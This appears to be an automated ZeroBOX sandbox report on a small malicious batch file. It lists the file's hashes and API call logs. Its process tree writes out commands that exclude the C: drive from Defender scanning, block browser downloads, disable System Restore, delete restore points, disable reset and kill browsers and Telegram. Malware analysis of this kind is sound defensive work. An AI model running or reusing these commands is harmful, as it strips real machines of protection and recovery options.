Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 16, 2023, 5:58 p.m.	May 16, 2023, 6 p.m.

Size	2.4KB
Type	ASCII text
MD5	`7a101f92a30ccd73bcdd71c103475442`
SHA256	`750831caed6c6beca3cddd1b08aa53d1fb3e81e608357e3fee8201675f305d49`
CRC32	`54D3E68B`
ssdeep	`48:8KkxwZpIFOLJPGGZa0nE4lpiHwf4tvrti6fp:bkCjIFOVOGZLE4lcwf4Bt9p`
Yara	Antivirus - Contains references to security software Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "xxtwVvtPSffAawV" C:\Users\test22\AppData\Local\Temp\test2.bat
3036
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\test2.bat
  2212
  - net.exe NET FILE
    2272
    - net1.exe C:\Windows\system32\net1 FILE
      2376
  - powershell.exe powershell.exe -command Add-MpPreference -ExclusionPath C:\
    2424
  - reg.exe reg add "HKEY_CURRENT_USER\Software\Policies\Google\chrome" /v DownloadRestrictions /t REG_DWORD /d 3 /f
    1652
  - reg.exe reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Edge" /v DownloadRestrictions /t REG_DWORD /d 3 /f
    2528
  - WMIC.exe wmic /namespace:\\root\default path SystemRestore call Disable("")
    1692
  - WMIC.exe wmic /namespace:\\root\default path SystemRestore call DeleteAllRestorePoints
    2568
  - reg.exe reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT" /v SystemRestore /t REG_SZ /d " " /f
    2816
  - reg.exe reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    2828
  - reg.exe reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows NT\SystemRestore" /v SystemRestorePointCreationFrequency /t REG_DWORD /d 0 /f
    2912
  - reg.exe reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableReset /t REG_DWORD /d 1 /f
    3008
  - taskkill.exe taskkill /F /IM chrome.exe
    2776
  - taskkill.exe taskkill /F /IM msedge.exe
    2160
  - taskkill.exe taskkill /F /IM opera.exe
    292
  - taskkill.exe taskkill /F /IM brave.exe
    924
  - taskkill.exe taskkill /F /IM firefox.exe
    2520
  - taskkill.exe taskkill /F /IM Telegram.exe
    564

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 16, 2023, 5:58 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 16, 2023, 5:58 p.m.			0	0
IsDebuggerPresent May 16, 2023, 5:58 p.m.			0	0
IsDebuggerPresent May 16, 2023, 5:58 p.m.			0	0

Command line console output was observed (27 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\ console_handle: 0x00000053	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: Executing (SystemRestore)->Disable() console_handle: 0x0000000b	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: Method execution successful. console_handle: 0x0000000b	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: Out Parameters: console_handle: 0x0000000b	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: instance of __PARAMETERS { ReturnValue = 0; }; console_handle: 0x0000000b	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: DeleteAllRestorePoints console_handle: 0x0000000f	1	1
WriteConsoleA May 16, 2023, 5:58 p.m.	buffer: - Invalid class method. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: The operation completed successfully. console_handle: 0x0000000b	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "chrome.exe" not found. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "msedge.exe" not found. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "opera.exe" not found. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "brave.exe" not found. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "firefox.exe" not found. console_handle: 0x0000000f	1	1
WriteConsoleW May 16, 2023, 5:58 p.m.	buffer: ERROR: The process "Telegram.exe" not found. console_handle: 0x0000000f	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d5a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d2e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cee0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028c9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028c9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028c9e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d0a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028d3a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 16, 2023, 5:58 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0028cb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 16, 2023, 5:58 p.m.		1	1	0

One or more processes crashed (4 events)

Time & API	Arguments	Status
__exception__ May 16, 2023, 5:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75ae4387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x750aef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x750a6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x750c5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x751406b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75bbd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75bbd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75bbddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75ad8a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75ad8938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75ad950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75bbdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75bbdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75bbe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75ad9367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75ad9326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x757377c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7573788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75a9a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75a9853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75a9a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75aacd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75aad87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 33419932 registers.edi: 5954588 registers.eax: 33419932 registers.ebp: 33420012 registers.edx: 50 registers.ebx: 33420296 registers.esi: 2147746133 registers.ecx: 5727792	1
__exception__ May 16, 2023, 5:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75bbf725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x750c414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75a8fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75bba338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752ce99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752a72ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7529ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x752cc048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752987f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x75298926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x7529d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x752cc44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7529d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7529d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7529d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7529991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x75298d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7529a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x75299b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x75299aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x74196f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x74196e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x741927a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x74192652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7419253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x74192411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x741925ab wmic+0x39c80 @ 0x7e9c80 wmic+0x3b06a @ 0x7eb06a wmic+0x3b1f8 @ 0x7eb1f8 wmic+0x36fcd @ 0x7e6fcd wmic+0x3d6e9 @ 0x7ed6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 2812752 registers.edi: 1974270480 registers.eax: 2812752 registers.ebp: 2812832 registers.edx: 1 registers.ebx: 5697452 registers.esi: 2147746133 registers.ecx: 2881277421	1
__exception__ May 16, 2023, 5:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x75ae4387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x750aef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x750a6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x750a6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x750c5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x751406b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x75bbd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x75bbd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x75bbddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x75ad8a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x75ad8938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x75ad950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x75bbdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x75bbdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x75bbe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x75ad9367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x75ad9326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x757362fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75736d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x757377c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7573788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x75a9a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x75a9853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x75a9a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x75aacd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x75aad87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 41086848 registers.edi: 6675204 registers.eax: 41086848 registers.ebp: 41086928 registers.edx: 50 registers.ebx: 41087212 registers.esi: 2147746133 registers.ecx: 6448736	1
__exception__ May 16, 2023, 5:58 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75bbf725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x750c414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75a8fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75bba338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x752ce99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x752a72ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7529ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x752cc048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752987f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x75298926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e 